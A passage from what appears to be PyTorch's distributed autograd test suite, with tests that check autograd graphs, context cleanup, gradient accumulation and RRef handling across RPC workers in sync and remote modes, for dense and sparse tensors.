    """Issue a nested RPC chain that loops back to the calling rank and
    verify both the local context (two send/recv pairs) and the peer's
    forwarding context.

    Args:
        exec_mode: ExecMode.RPC_SYNC or ExecMode.REMOTE.
        sparse: if True, use sparse input tensors instead of dense ones.

    Raises:
        ValueError: if exec_mode is neither RPC_SYNC nor REMOTE.
    """
    dst_rank = (self.rank + 1) % self.world_size
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    with dist_autograd.context() as context_id:
        if sparse:
            t1 = build_sparse_tensor(requires_grad=True)
            t2 = build_sparse_tensor(requires_grad=True)
        else:
            t1 = torch.ones(3, 3, requires_grad=True)
            t2 = torch.zeros(3, 3, requires_grad=True)
        if ExecMode.RPC_SYNC == exec_mode:
            ret = rpc.rpc_sync(
                worker_name(dst_rank),
                my_py_nested_call,
                args=(
                    t1,
                    t2,
                    # Loop the nested hop back to this rank.
                    (self.rank - 1 + self.world_size) % self.world_size,
                    self.world_size,
                    0,
                ),
            )
        elif ExecMode.REMOTE == exec_mode:
            ret = rpc.remote(
                worker_name(dst_rank),
                my_py_nested_call,
                args=(
                    t1,
                    t2,
                    (self.rank - 1 + self.world_size) % self.world_size,
                    self.world_size,
                    0,
                ),
            ).to_here()
        else:
            raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
        rpc.rpc_sync(
            worker_name((self.rank + 1) % self.world_size),
            _set_rpc_done,
            args=(context_id, 1),
        )
        # For self.rank, it has 2 graphs to verify.
        # One is for current context id when this rank send first rpc
        # call and execute the torch.add() operator.
        # Another one is for prev context id when this rank make
        # nested call.
        ctx = dist_autograd._current_context()
        self.assertEqual(context_id, ctx._context_id())
        send_functions = ctx._send_functions()
        self.assertEqual(2, len(send_functions))
        recv_functions = ctx._recv_functions()
        self.assertEqual(2, len(recv_functions))
        self._verify_graph_for_first_rpc_call(
            list(send_functions.values())[0],
            list(recv_functions.values())[1],
            t1,
            t2,
            ret,
        )
        self._verify_graph_for_rpc_call_exec(list(send_functions.values())[1])
        # Verify two pairs of send and recv functions for nested
        # call
        self._check_rpc_done(1)
        ctx = dist_autograd._retrieve_context(ctx_ids[1])
        self._verify_graph_for_nested_rpc_call(ctx)
        # this barrier is needed so one worker does not clean up their
        # autograd context before another worker tries to access it.
        dist.barrier()
@dist_init
def test_graph_for_py_nested_call_itself(self):
    """Loop-back nested chain via rpc_sync (dense tensors)."""
    self._test_graph_for_py_nested_call_itself(
        exec_mode=ExecMode.RPC_SYNC, sparse=False
    )
@dist_init
def test_graph_for_py_nested_call_itself_sparse(self):
    """Loop-back nested chain via rpc_sync (sparse tensors)."""
    self._test_graph_for_py_nested_call_itself(
        exec_mode=ExecMode.RPC_SYNC, sparse=True
    )
@dist_init
def test_graph_for_py_nested_remote_call_itself(self):
    """Loop-back nested chain via rpc.remote (dense tensors)."""
    self._test_graph_for_py_nested_call_itself(
        exec_mode=ExecMode.REMOTE, sparse=False
    )
@dist_init
def test_graph_for_py_nested_remote_call_itself_sparse(self):
    """Loop-back nested chain via rpc.remote (sparse tensors)."""
    self._test_graph_for_py_nested_call_itself(
        exec_mode=ExecMode.REMOTE, sparse=True
    )
def _test_no_graph_with_tensors_not_require_grad(self, exec_mode, sparse):
    """When no input tensor requires grad, no send/recv autograd functions
    should be recorded locally, yet the autograd context is still propagated
    to the callee.

    Args:
        exec_mode: ExecMode.RPC_SYNC or ExecMode.REMOTE.
        sparse: if True, use sparse input tensors instead of dense ones.

    Raises:
        ValueError: if exec_mode is neither RPC_SYNC nor REMOTE.
    """
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    dst_rank = (self.rank + 1) % self.world_size
    with dist_autograd.context() as context_id:
        if sparse:
            t1 = build_sparse_tensor(requires_grad=False)
            t2 = build_sparse_tensor(requires_grad=False)
        else:
            t1 = torch.ones(3, 3, requires_grad=False)
            t2 = torch.zeros(3, 3, requires_grad=False)
        if ExecMode.RPC_SYNC == exec_mode:
            ret = rpc.rpc_sync(
                worker_name(dst_rank), torch.add, args=(t1, t2)
            )
        elif ExecMode.REMOTE == exec_mode:
            ret = rpc.remote(
                worker_name(dst_rank), torch.add, args=(t1, t2)
            ).to_here()
        else:
            raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
        rpc.rpc_sync(
            worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
        )
        # No grad-requiring tensors crossed the wire, so nothing was
        # attached to the local autograd graph.
        ctx = dist_autograd._current_context()
        send_functions = ctx._send_functions()
        self.assertEqual(len(send_functions), 0)
        recv_functions = ctx._recv_functions()
        self.assertEqual(len(recv_functions), 0)
        # Wait for the prev rank to be done with rpc.
        self._check_rpc_done(1)
        # NB: RRef.to_here() always passes the autograd context to the
        # the callee, as the caller does not know whether the return
        # value would contain a requires_grad tensor or not.
        #
        # rpc/remote with udf (_set_rpc_done here) also always passes the
        # autograd context to the callee due to the same reason.
        self.assertNotEqual(-1, dist_autograd._retrieve_context(ctx_ids[1]))
        dist.barrier()
@dist_init
def test_no_graph_with_tensors_not_require_grad(self):
    """No graph recorded for no-grad dense tensors over rpc_sync."""
    self._test_no_graph_with_tensors_not_require_grad(
        exec_mode=ExecMode.RPC_SYNC, sparse=False
    )
@dist_init
def test_no_graph_with_tensors_not_require_grad_sparse(self):
    """No graph recorded for no-grad sparse tensors over rpc_sync."""
    self._test_no_graph_with_tensors_not_require_grad(
        exec_mode=ExecMode.RPC_SYNC, sparse=True
    )
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote(self):
    """No graph recorded for no-grad dense tensors over rpc.remote."""
    self._test_no_graph_with_tensors_not_require_grad(
        exec_mode=ExecMode.REMOTE, sparse=False
    )
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote_sparse(self):
    """No graph recorded for no-grad sparse tensors over rpc.remote."""
    self._test_no_graph_with_tensors_not_require_grad(
        exec_mode=ExecMode.REMOTE, sparse=True
    )
def _test_grad_only_on_return_value(self, exec_mode):
    """When only the remote RETURN value requires grad (the call takes no
    tensor args), backward must still produce a gradient for the remote
    tensor, visible on the callee via its recorded context.

    Args:
        exec_mode: ExecMode.RPC_SYNC or ExecMode.REMOTE.

    Raises:
        ValueError: if exec_mode is neither RPC_SYNC nor REMOTE.
    """
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    dst_rank = (self.rank + 1) % self.world_size
    with dist_autograd.context() as context_id:
        if ExecMode.RPC_SYNC == exec_mode:
            ret = rpc.rpc_sync(worker_name(dst_rank), ret_requires_grad)
        elif ExecMode.REMOTE == exec_mode:
            ret = rpc.remote(
                worker_name(dst_rank), ret_requires_grad
            ).to_here()
        else:
            raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
        dist_autograd.backward(context_id, [ret.sum()])
        rpc.rpc_sync(
            worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
        )
        # Wait for the prev rank to be done with rpc.
        self._check_rpc_done(1)
        # Inspect the gradients the PREVIOUS rank's backward left in our
        # context (ctx_ids is populated by _set_rpc_done).
        grads = dist_autograd.get_gradients(ctx_ids[1])
        self.assertEqual(1, len(grads))
        # NOTE(review): requires_grad_tensor is presumably the module-level
        # tensor returned by ret_requires_grad on this worker — confirm.
        self.assertIn(requires_grad_tensor, grads)
        self.assertEqual(torch.ones_like(ret), grads[requires_grad_tensor])
        # due to the above get_gradients call, ensure that dist autograd
        # contexts aren't cleaned up until all workers exit context managers
        dist.barrier()
@dist_init
def test_grad_only_on_return_value(self):
    """Grad flows when only the rpc_sync return value requires grad."""
    self._test_grad_only_on_return_value(exec_mode=ExecMode.RPC_SYNC)
@dist_init
def test_grad_only_on_return_value_remote(self):
    """Grad flows when only the rpc.remote return value requires grad."""
    self._test_grad_only_on_return_value(exec_mode=ExecMode.REMOTE)
def _test_rpc_complex_args(self, exec_mode, sparse):
    """Pass a list of tensors (only some requiring grad) through one RPC and
    verify the grad-requiring ones are attached to the autograd graph and the
    destination worker id is recorded in the context.

    Args:
        exec_mode: ExecMode.RPC_SYNC or ExecMode.REMOTE.
        sparse: if True, build sparse tensors instead of dense ones.

    Raises:
        ValueError: if exec_mode is neither RPC_SYNC nor REMOTE.
    """
    with dist_autograd.context() as context_id:
        num_tensors = 10
        tensors = []
        # Every other tensor requires grad.
        for i in range(num_tensors):
            if sparse:
                tensor = build_sparse_tensor(requires_grad=(i % 2 == 0))
            else:
                tensor = torch.ones(3, 3, requires_grad=(i % 2 == 0))
            tensors.append(tensor)
        dst_rank = self._next_rank()
        if ExecMode.RPC_SYNC == exec_mode:
            ret = rpc.rpc_sync(
                worker_name(dst_rank), torch.stack, args=(tensors,)
            )
        elif ExecMode.REMOTE == exec_mode:
            ret = rpc.remote(
                worker_name(dst_rank), torch.stack, args=(tensors,)
            ).to_here()
        else:
            raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
        self.assertEqual(torch.stack(tensors), ret)
        # Verify appropriate tensors have been attached the autograd graph.
        # NOTE(review): removed unused local `idx` that was never read.
        next_funcs = list(
            dist_autograd._current_context()._send_functions().values()
        )[0].next_functions
        # NOTE(review): all tensors here share identical values, so the
        # value-equality assert below cannot distinguish which input each
        # autograd edge belongs to — it only checks values match.
        for i in range(len(next_funcs)):
            self.assertEqual(
                "torch::autograd::AccumulateGrad", next_funcs[i][0].name()
            )
            self.assertEqual(tensors[i], next_funcs[i][0].variable)
        # Verify that the worker id has been recorded in the context
        ctx = dist_autograd._current_context()
        worker_ids = ctx._known_worker_ids()
        self.assertEqual(len(worker_ids), 1)
        self.assertEqual(worker_ids, {dst_rank})
@dist_init
def test_rpc_complex_args(self):
    """Mixed grad/no-grad dense tensor list through rpc_sync."""
    self._test_rpc_complex_args(exec_mode=ExecMode.RPC_SYNC, sparse=False)
@dist_init
def test_rpc_complex_args_sparse(self):
    """Mixed grad/no-grad sparse tensor list through rpc_sync."""
    self._test_rpc_complex_args(exec_mode=ExecMode.RPC_SYNC, sparse=True)
@dist_init
def test_remote_complex_args(self):
    """Mixed grad/no-grad dense tensor list through rpc.remote."""
    self._test_rpc_complex_args(exec_mode=ExecMode.REMOTE, sparse=False)
@dist_init
def test_remote_complex_args_sparse(self):
    """Mixed grad/no-grad sparse tensor list through rpc.remote."""
    self._test_rpc_complex_args(exec_mode=ExecMode.REMOTE, sparse=True)
def context_cleanup_test_helper(self, rpc_args, func, nested=False):
    """Exercise autograd-context cleanup after the context manager exits.

    Args:
        rpc_args: argument tuple forwarded to ``func`` over RPC.
        func: callable executed on each destination rank.
        nested: if True, only target the next rank (which itself makes a
            nested call to the rank after it); otherwise target all peers.
    """
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    # test that in dist autograd, in the case that tensors communicated over RPC do
    # NOT require grad, we still cleanup the dist autograd contexts created
    # on other nodes. This is because the autograd context is still
    # communicated over RPC even if tensor arguments do not require grad, as
    # it is possible that the response could.
    if nested:
        dst_rank = (self.rank + 1) % self.world_size
        nested_dst_rank = (dst_rank + 1) % self.world_size
        dst_ranks = {dst_rank}
    else:
        dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
    with dist_autograd.context() as context_id:
        for dst_rank in dst_ranks:
            rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
            rpc.rpc_sync(
                worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
            )
            if nested:
                # The nested hop also records our context; mark it done there.
                rpc.rpc_sync(
                    worker_name(nested_dst_rank),
                    _set_rpc_done,
                    args=(context_id, 2),
                )
    # the thread's context id should be cleaned up
    with self.assertRaises(RuntimeError):
        dist_autograd._retrieve_context(context_id)
    # Ensure all peers have finished mutating the
    # `known_context_ids` set.
    dist.barrier()
    # check that all contexts have been cleaned up.
    success = _all_contexts_cleaned_up()
    self.assertTrue(success)
@dist_init
def test_context_cleanup_tensor_with_grad(self):
    """Dense grad-requiring args: remote contexts must be torn down."""
    args = (
        torch.ones(3, 3, requires_grad=True),
        torch.zeros(3, 3, requires_grad=True),
    )
    self.context_cleanup_test_helper(rpc_args=args, func=torch.add)
@dist_init
def test_context_cleanup_tensor_with_grad_sparse(self):
    """Sparse grad-requiring args: remote contexts must be torn down."""
    args = (
        build_sparse_tensor(requires_grad=True),
        build_sparse_tensor(requires_grad=True),
    )
    self.context_cleanup_test_helper(rpc_args=args, func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad(self):
    """No-grad dense args: contexts are still propagated and cleaned up."""
    plain = torch.ones(3, 3, requires_grad=False)
    self.context_cleanup_test_helper(rpc_args=(plain, plain), func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad_sparse(self):
    """No-grad sparse args: contexts are still propagated and cleaned up."""
    plain = build_sparse_tensor(requires_grad=False)
    self.context_cleanup_test_helper(rpc_args=(plain, plain), func=torch.add)
@dist_init
def test_context_cleanup_no_tensors(self):
    """Scalar-only args: contexts are still propagated and cleaned up."""
    scalars = (1, 1)
    self.context_cleanup_test_helper(rpc_args=scalars, func=my_scalar_add)
@dist_init
def test_context_cleanup_nested_rpc(self):
    """Nested dense-tensor RPC: contexts on both hops must be cleaned up."""
    t1 = torch.ones(3, 3, requires_grad=True)
    t2 = torch.zeros(3, 3, requires_grad=True)
    nxt = (self.rank + 1) % self.world_size
    self.context_cleanup_test_helper(
        rpc_args=(t1, t2, nxt, self.world_size, 0),
        func=my_py_nested_call,
        nested=True,
    )
@dist_init
def test_context_cleanup_nested_rpc_sparse(self):
    """Nested sparse-tensor RPC: contexts on both hops must be cleaned up."""
    t1 = build_sparse_tensor(requires_grad=True)
    t2 = build_sparse_tensor(requires_grad=True)
    nxt = (self.rank + 1) % self.world_size
    self.context_cleanup_test_helper(
        rpc_args=(t1, t2, nxt, self.world_size, 0),
        func=my_py_nested_call,
        nested=True,
    )
@dist_init
def test_worker_ids_recorded(self):
    """Destination worker ids must be recorded in the context both when the
    tensor args require grad and when they do not."""
    dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
    with dist_autograd.context() as context_id:
        # if no tensors require grad, we should still record worker_ids, as
        # the autograd context ID is still passed to other workers.
        t1 = torch.ones(3, 3, requires_grad=False)
        t2 = torch.zeros(3, 3, requires_grad=False)
        for dst_rank in dst_ranks:
            rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
            rpc.rpc_sync(
                worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
            )
        # all worker_ids in dst_ranks should be recorded.
        ctx = dist_autograd._current_context()
        worker_ids = ctx._known_worker_ids()
        self.assertEqual(worker_ids, dst_ranks)
        # worker_ids should be recorded when tensors do require grad
        t1.requires_grad = True
        t2.requires_grad = True
        for dst_rank in dst_ranks:
            ret = rpc.rpc_sync(
                worker_name(dst_rank), torch.add, args=(t1, t2)
            )
            rpc.rpc_sync(
                worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
            )
        # all worker_ids in dst_ranks should be recorded.
        worker_ids = ctx._known_worker_ids()
        self.assertEqual(worker_ids, dst_ranks)
@dist_init
def test_dist_autograd_profiling(self):
    """Profile a distributed backward pass and check that send/recv autograd
    functions show up once each and are contained within the overall
    backward event's CPU time."""
    with dist_autograd.context() as context_id:
        t1 = torch.rand(3, 3, requires_grad=True)
        t2 = torch.rand(3, 3, requires_grad=True)
        loss = rpc.rpc_sync(worker_name(self._next_rank()), torch.add, args=(t1, t2)).sum()
        with torch.autograd.profiler.profile() as p:
            dist_autograd.backward(context_id, [loss])
        function_events = p.function_events

        def get_event(partial_key):
            # First profiler event whose name contains partial_key;
            # raises IndexError if no such event was recorded.
            return [event for event in function_events if partial_key in event.name][0]

        send_event = get_event("SendRpcBackward")
        recv_event = get_event("RecvRpcBackward")
        backward_event = get_event("torch::distributed::autograd::backward")
        # There should be at least 1 send and recv_events each, corresponding to send/recv functions executed.
        self.assertEqual(send_event.count, 1)
        self.assertEqual(recv_event.count, 1)
        # The CPU total for backward event should be great than send and recv, since
        # applying those functions in the backwards pass is a subset of the entire backward pass.
        self.assertGreater(backward_event.cpu_time_total, send_event.cpu_time_total)
        self.assertGreater(backward_event.cpu_time_total, recv_event.cpu_time_total)
@dist_init
def test_error_in_context(self):
    """A shape-mismatched remote matmul must surface as a RuntimeError."""
    with dist_autograd.context() as context_id:
        lhs = torch.rand(3, 3, requires_grad=True)
        rhs = torch.rand(6, 6, requires_grad=True)
        # (3,3) x (6,6) is invalid; the remote error propagates back here.
        with self.assertRaises(RuntimeError):
            rpc.rpc_sync(
                worker_name(self._next_rank()), torch.matmul, args=(lhs, rhs)
            )
def _backward_no_grad_on_tensor(self, t1, t2, sparse):
    """dist_autograd.backward must accumulate gradients only in the context
    (never in ``.grad``), and must not clobber ``.grad`` values previously
    populated by the local autograd engine.

    Args:
        t1, t2: leaf tensors with requires_grad=True.
        sparse: NOTE(review) — unused in this helper; apparently kept so all
            ``_backward_*`` helpers share the same signature. Confirm.
    """
    with dist_autograd.context() as context_id:
        ret = rpc.rpc_sync(
            worker_name(self._next_rank()),
            torch.add,
            args=(t1, t2))
        loss = my_sum(ret)
        dist_autograd.backward(context_id, [loss], retain_graph=True)
        # Dist autograd keeps grads in the context, not on the tensors.
        self.assertIsNone(t1.grad)
        self.assertIsNone(t2.grad)
        # Now populate .grad with local autograd engine and
        # verify dist autograd doesn't mess with it.
        ret = torch.add(t1, t2)
        loss_local = my_sum(ret)
        loss_local.backward()
        self.assertIsNotNone(t1.grad)
        self.assertIsNotNone(t2.grad)
        t1_grad_before = t1.grad
        t2_grad_before = t2.grad
        dist_autograd.backward(context_id, [loss])
        self.assertEqual(t1_grad_before, t1.grad)
        self.assertEqual(t2_grad_before, t2.grad)
@dist_init
def test_backward_no_grad_on_tensor(self):
    """Dense leaves: dist backward must not populate .grad."""
    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = torch.rand((3, 3), requires_grad=True)
    self._backward_no_grad_on_tensor(t1, t2, False)
@dist_init
def test_backward_no_grad_on_tensor_sparse(self):
    """Sparse leaves: dist backward must not populate .grad."""
    t1 = build_sparse_tensor(requires_grad=True)
    t2 = build_sparse_tensor(requires_grad=True)
    self._backward_no_grad_on_tensor(t1, t2, True)
# Run the same code locally and with dist autograd and verify gradients
# are same.
def _backward_simple(self, dst, t1, t2, local_grads, sparse):
    """Add two tensors in LOCAL, RPC_SYNC and REMOTE modes against ``dst``
    and verify all three produce identical gradients.

    Args:
        dst: destination rank for the non-local exec modes.
        t1, t2: leaf tensors with requires_grad=True.
        local_grads: initial reference gradients (usually None; the LOCAL
            pass fills them in for the later modes to compare against).
        sparse: NOTE(review) — unused in this helper; apparently kept so all
            ``_backward_*`` helpers share the same signature. Confirm.
    """
    for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
        with dist_autograd.context() as context_id:
            ret = self._exec_func_with_dst(
                dst, exec_mode, torch.add, t1, t2
            )
            loss = my_sum(ret)
            ret = self._verify_backwards(
                exec_mode, [loss], context_id, local_grads, t1, t2
            )
            # First (LOCAL) iteration returns the reference grads; keep them.
            local_grads = ret if ret else local_grads
@dist_init
def test_backward_simple(self):
    """Dense add against the next rank; grads must match local autograd."""
    dst = self._next_rank()
    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = torch.rand((3, 3), requires_grad=True)
    self._backward_simple(dst, t1, t2, None, False)
@dist_init
def test_backward_simple_sparse(self):
    """Sparse add against the next rank; grads must match local autograd."""
    dst = self._next_rank()
    t1 = build_sparse_tensor(requires_grad=True)
    t2 = build_sparse_tensor(requires_grad=True)
    self._backward_simple(dst, t1, t2, None, True)
@dist_init
def test_backward_simple_self(self):
    """Dense add against this very rank (self-RPC); grads must match."""
    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = torch.rand((3, 3), requires_grad=True)
    self._backward_simple(self.rank, t1, t2, None, False)
@dist_init
def test_backward_simple_self_sparse(self):
    """Sparse add against this very rank (self-RPC); grads must match."""
    t1 = build_sparse_tensor(requires_grad=True)
    t2 = build_sparse_tensor(requires_grad=True)
    self._backward_simple(self.rank, t1, t2, None, True)
# The current rank first creates a tensor on the rref_owner, and then passes
# the rref with another tensor to the callee to run either my_rref_add or
# my_nested_rref_add, depending on whether the callee is the rref owner.
# The grad of tensor lives on the current rank, and the grad of the rref
# tensor lives on the rref owner.
def _backward_rref(self, callee, rref_owner, t1, t2, local_grads, sparse):
    """Backward through an RRef-based add; verify the local-arg gradient here
    and the rref-tensor gradient on its owner.

    Args:
        callee: worker that runs the add.
        rref_owner: worker owning the remotely created tensor.
        t1, t2: local leaf tensors (t2 crosses the wire; t1 only seeds the
            local reference gradient computed below).
        local_grads: NOTE(review) — unused in this helper; apparently kept
            for signature symmetry with the other ``_backward_*`` helpers.
        sparse: if True, create the remote tensor sparse as well.
    """
    # Local reference pass: populates t1.grad / t2.grad for comparison.
    local_ret = torch.add(t1, t2)
    local_ret = my_sum(local_ret)
    local_ret.backward()
    with dist_autograd.context() as context_id:
        if sparse:
            rref_t1 = rpc.remote(
                rref_owner, build_sparse_tensor, args=(False, True,)
            )
        else:
            rref_t1 = rpc.remote(
                rref_owner, _torch_ones, args=((3, 3),), kwargs={"requires_grad": True}
            )
        if callee == rref_owner:
            rref = rpc.remote(callee, my_rref_add, args=(rref_t1, t2))
        else:
            rref = rpc.remote(
                callee, my_nested_rref_add, args=(rref_owner, rref_t1, t2)
            )
        ret = rref.to_here()
        ret = my_sum(ret)
        dist_autograd.backward(context_id, [ret])
        # verify grads on caller
        grads = dist_autograd.get_gradients(context_id)
        self.assertIn(t2, grads)
        self.assertEqual(grads[t2], t2.grad)
        # verify grads on rref owner (compared against t1.grad from the
        # local reference pass above).
        self.assertTrue(
            rpc.rpc_sync(
                rref_owner,
                _compare_owner_value,
                args=(context_id, rref_t1, t1.grad),
            )
        )
@dist_init
def test_backward_rref(self):
    """Callee and rref owner are the same (next) worker; dense tensors."""
    owner = worker_name(self._next_rank())
    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = torch.rand((3, 3), requires_grad=True)
    self._backward_rref(owner, owner, t1, t2, None, False)
@dist_init
def test_backward_rref_sparse(self):
    """Callee and rref owner are the same (next) worker; sparse tensors."""
    owner = worker_name(self._next_rank())
    t1 = build_sparse_tensor(requires_grad=True)
    t2 = build_sparse_tensor(requires_grad=True)
    self._backward_rref(owner, owner, t1, t2, None, True)
@dist_init
def test_backward_rref_multi(self):
    """All non-zero ranks target worker0 as callee and rref owner (dense)."""
    if self.rank > 0:
        owner = "worker0"
        t1 = torch.rand((3, 3), requires_grad=True)
        t2 = torch.rand((3, 3), requires_grad=True)
        self._backward_rref(owner, owner, t1, t2, None, False)
@dist_init
def test_backward_rref_multi_sparse(self):
    """All non-zero ranks target worker0 as callee and rref owner (sparse)."""
    if self.rank > 0:
        owner = "worker0"
        t1 = build_sparse_tensor(requires_grad=True)
        t2 = build_sparse_tensor(requires_grad=True)
        self._backward_rref(owner, owner, t1, t2, None, True)
@dist_init
def test_backward_rref_nested(self):
    """Callee and rref owner are distinct workers (nested rref add, dense)."""
    callee = worker_name((self.rank + 1) % self.world_size)
    owner = worker_name((self.rank + 2) % self.world_size)
    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = torch.rand((3, 3), requires_grad=True)
    self._backward_rref(callee, owner, t1, t2, None, False)
@dist_init
def test_backward_rref_nested_sparse(self):
    """Callee and rref owner are distinct workers (nested rref add, sparse)."""
    callee = worker_name((self.rank + 1) % self.world_size)
    owner = worker_name((self.rank + 2) % self.world_size)
    t1 = build_sparse_tensor(requires_grad=True)
    t2 = build_sparse_tensor(requires_grad=True)
    self._backward_rref(callee, owner, t1, t2, None, True)
# In this test, every rank serves as a parameter server (ps) and a driver,
# and kicks off trainers on the other three ranks. So, we have:
# ps = rank0 with trainers = rank1/2/3
# ps = rank1 with trainers = rank2/3/0
# ps = rank2 with trainers = rank3/0/1
# ps = rank3 with trainers = rank0/1/2
#
# These four test ps-trainer groups run on completely separate autograd
# graphs, but they share the same set of underlying RpcAgents.
def _test_trainer_ps(self, create_ref_fn, trainer_fn, sparse):
    """Act as parameter server: create an rref on self, fan trainers out to
    the other ranks, then verify each trainer accumulated the same gradient
    for the shared rref tensor.

    Args:
        create_ref_fn: zero-arg factory run on self to create the rref tensor.
        trainer_fn: function executed asynchronously on each trainer rank.
        sparse: if True, use sparse local tensors instead of dense ones.
    """
    if sparse:
        t1 = build_sparse_tensor(requires_grad=True)
        t2 = build_sparse_tensor(requires_grad=True)
    else:
        t1 = torch.ones((3, 3), requires_grad=True)
        t2 = torch.zeros((3, 3), requires_grad=True)
    # Local reference backward pass; populates t1.grad for comparison below.
    local_ret = torch.add(t1, t2)
    my_sum(local_ret).backward()
    # create rref on self
    rref_t1 = rpc.remote(
        worker_name(self.rank),
        create_ref_fn,
        args=())
    # kick off forward and backward pass on three other workers (trainers)
    rank_diffs = [1, 2, 3]
    futures = []
    for rank_diff in rank_diffs:
        futures.append(
            rpc.rpc_async(
                worker_name((self.rank + rank_diff) % self.world_size),
                trainer_fn,
                args=(rref_t1, t2, worker_name(self.rank), rank_diff),
            )
        )
    # check if the trainers have done with their backward pass
    for rank_diff in rank_diffs:
        self._check_rpc_done(rank_diff)
    # trainers are done and holding the context for verification
    # NOTE(review): accumulate_grad_func is assigned but never read —
    # looks like a leftover; candidate for removal.
    accumulate_grad_func = None
    for rank_diff in rank_diffs:
        # make sure grads are accumulated for the same tensors and values
        # are all correct
        ctx_id = ctx_ids[rank_diff]
        grads = dist_autograd.get_gradients(ctx_id)
        local_t1 = rref_t1.to_here()
        self.assertIn(local_t1, grads)
        self.assertEqual(grads[local_t1], t1.grad)
    # unblock trainers
    _set_rpc_done(None, 0)
    # wait until all trainers are done
    torch.futures.wait_all(futures)
@dist_init
def test_trainer_ps(self):
    """This rank acts as parameter server for dense-tensor trainers."""
    self._test_trainer_ps(
        create_ref_fn=create_tensor, trainer_fn=_run_trainer, sparse=False
    )
@dist_init
def test_trainer_ps_sparse(self):
    """This rank acts as parameter server for sparse-tensor trainers."""
    self._test_trainer_ps(
        create_ref_fn=build_sparse_tensor, trainer_fn=_run_trainer, sparse=True
    )
@dist_init
def test_trainer_ps_torchscript_functions(self):
    """Same ps/trainer flow but with TorchScript factory and trainer fns."""
    # TODO, need more investigation
    # there is rref leak when shutting down, suspect it is because
    # ref as arg is passed to pybind boundary, and the ref is not garbage
    # collected by python when calling shutdown()
    import torch.distributed.rpc.api as api
    api._ignore_rref_leak = True
    self._test_trainer_ps(create_torchscript_tensor, _run_trainer_torchscript, False)
def _backward_multiple_round_trips(self, t1, t2, t3, t4, t5, local_grads):
    """Chain several ops across different nodes in LOCAL, RPC_SYNC and
    REMOTE modes and verify all three produce identical gradients.

    Args:
        t1..t5: input tensors (mix of grad / no-grad leaves).
        local_grads: reference grads; the LOCAL pass fills them in.
    """
    for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
        with dist_autograd.context() as context_id:
            # Multiple RPCs between different nodes.
            val = self._exec_func(exec_mode, torch.add, t1, t2)
            val = self._exec_func(exec_mode, torch.mul, t3, val)
            s1 = self._exec_func(exec_mode, torch.stack, (t4, val))
            s2 = self._exec_func(exec_mode, torch.stack, (t5, val))
            # Sparse tensors have no bmm/matmul; use mul + sparse.sum there.
            if s1.is_sparse:
                val = self._exec_func(exec_mode, torch.mul, s1, s2)
                val = self._exec_func(exec_mode, torch.mul, val, val)
                loss = torch.sparse.sum(val)
            else:
                val = self._exec_func(exec_mode, torch.bmm, s1, s2)
                val = self._exec_func(exec_mode, torch.matmul, val, val)
                loss = val.sum()
            ret = self._verify_backwards(
                exec_mode, [loss], context_id, local_grads, t1, t2, t3, t4, t5
            )
            # First (LOCAL) iteration returns the reference grads; keep them.
            local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_round_trips(self):
    """Dense tensors through a multi-hop op chain; grads must match local."""
    leaf1 = torch.rand((3, 3), requires_grad=True)
    mid1 = torch.rand((3, 3))
    leaf2 = torch.rand((3, 3), requires_grad=True)
    mid2 = torch.rand((3, 3))
    leaf3 = torch.rand((3, 3), requires_grad=True)
    self._backward_multiple_round_trips(leaf1, mid1, leaf2, mid2, leaf3, None)
@dist_init
def test_backward_multiple_round_trips_sparse(self):
    """Sparse tensors through a multi-hop op chain; grads must match local."""
    leaf1 = build_sparse_tensor(requires_grad=True)
    mid1 = build_sparse_tensor(requires_grad=False)
    leaf2 = build_sparse_tensor(requires_grad=True)
    mid2 = build_sparse_tensor(requires_grad=False)
    leaf3 = build_sparse_tensor(requires_grad=True)
    self._backward_multiple_round_trips(leaf1, mid1, leaf2, mid2, leaf3, None)
@dist_init
def test_backward_different_tensor_dims(self):
    """Matmul chain over tensors of different shapes; grads must agree
    across LOCAL, RPC_SYNC and REMOTE execution."""
    local_grads = None
    t1 = torch.rand((4, 6), requires_grad=True)
    t2 = torch.rand((6, 5))
    t3 = torch.rand((5, 7), requires_grad=True)
    t4 = torch.rand((7, 9))
    for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
        with dist_autograd.context() as context_id:
            val = self._exec_func(exec_mode, torch.matmul, t1, t2)
            val = self._exec_func(exec_mode, torch.linalg.multi_dot, (val, t3, t4))
            loss = val.sum()
            # NOTE(review): t2 is passed twice here (t1, t2, t2, t3, t4) —
            # looks unintentional; confirm against _verify_backwards' contract.
            ret = self._verify_backwards(
                exec_mode, [loss], context_id, local_grads, t1, t2, t2, t3, t4
            )
            local_grads = ret if ret else local_grads
@dist_init
def test_backward_unused_tensors(self):
    """Backward when one stacked input (t2) does not contribute to the loss;
    grads must still agree across LOCAL, RPC_SYNC and REMOTE."""
    local_grads = None
    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = torch.rand((3, 3), requires_grad=True)
    t3 = torch.rand((3, 3), requires_grad=True)
